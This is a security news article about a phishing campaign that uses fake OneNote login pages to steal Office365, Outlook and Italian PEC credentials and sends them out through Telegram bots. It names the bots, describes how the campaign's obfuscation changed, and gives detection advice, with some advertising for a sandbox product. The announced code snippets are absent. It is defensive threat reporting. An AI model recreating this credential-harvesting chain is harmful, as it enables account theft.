Hackers Imitate OneNote Login to Steal Office365 & Outlook Credentials

A sophisticated phishing campaign targeting Italian and U.S. users through fake Microsoft OneNote login prompts designed to harvest Office 365 and Outlook credentials. 

The attack leverages legitimate cloud services and Telegram bots for data exfiltration, making detection significantly more challenging for traditional security measures.

Phishing Campaign Targets Italian Users

The phishing operation begins with attackers hosting malicious pages on trusted platforms, including Notion workspaces, Glitch domains, Google Docs, and RenderForest services. 

Victims receive emails with subject lines like “New Document Shared with you,” directing them to fake OneNote pages that appear legitimate. 

The malicious pages present multiple authentication options, including Office365, Outlook, Rackspace, Aruba Mail, PEC, and other email services.

Celebrate ANY.RUN’s Birthday – Get extra licenses free with our interactive sandbox until May 31 – Try Here

According to ANY.RUN report, the campaign specifically targets Italian users and organizations, with phishing content written in Italian and subdomain names containing Italian words. 

The attack has been active since at least January 2022, demonstrating remarkable persistence and evolution over time.

The phishing pages employ sophisticated JavaScript code to capture victim credentials and IP addresses. The malware uses the ipify.org service to retrieve victims’ IP addresses through the following code implementation:

After credential collection, the stolen data is exfiltrated via Telegram bots using hardcoded bot tokens and chat IDs directly embedded in the phishing script. The exfiltration mechanism constructs requests to Telegram’s API endpoint:

Researchers identified multiple bot configurations throughout the campaign’s timeline, including bots named “Sultanna” (@Sultannanewbot), “remaxx24” (@remaxx24bot), and “Resultant” (@Resultantnewbot). 

The attack maintains persistence by redirecting victims to legitimate Microsoft OneNote login pages after credential theft, creating an illusion of legitimacy.

Evasion Techniques and Evolution

The campaign demonstrates significant technical evolution over its operational lifetime. Early variants used URL encoding obfuscation and web form submissions for data exfiltration. 

Starting February 2022, attackers transitioned to Telegram bot-based exfiltration with nested URL encoding (2-4 levels deep).

Between July and December 2024, the threat actors experimented with Base64 obfuscation but subsequently abandoned this technique for unknown reasons. 

The attackers deliberately avoid sophisticated evasion methods, suggesting either limited technical expertise or strategic focus on access brokering rather than payload development.

Security experts recommend monitoring network traffic for suspicious Telegram API communications, specifically requests to api.telegram.org containing the identified bot tokens. 

Organizations should implement behavioral pattern detection for domain chains following the “Notion → Glitch → Telegram API” structure and establish signature-based rules identifying unauthorized Telegram bot activity within corporate networks.

The campaign’s targeting of PEC (Posta Elettronica Certificata), Italy’s national certified email system, indicates potential objectives extending beyond simple credential theft to business email compromise and access brokering within cybercriminal ecosystems.

4 days left to level up your SOC. Get sandbox licenses for faster Threat Detection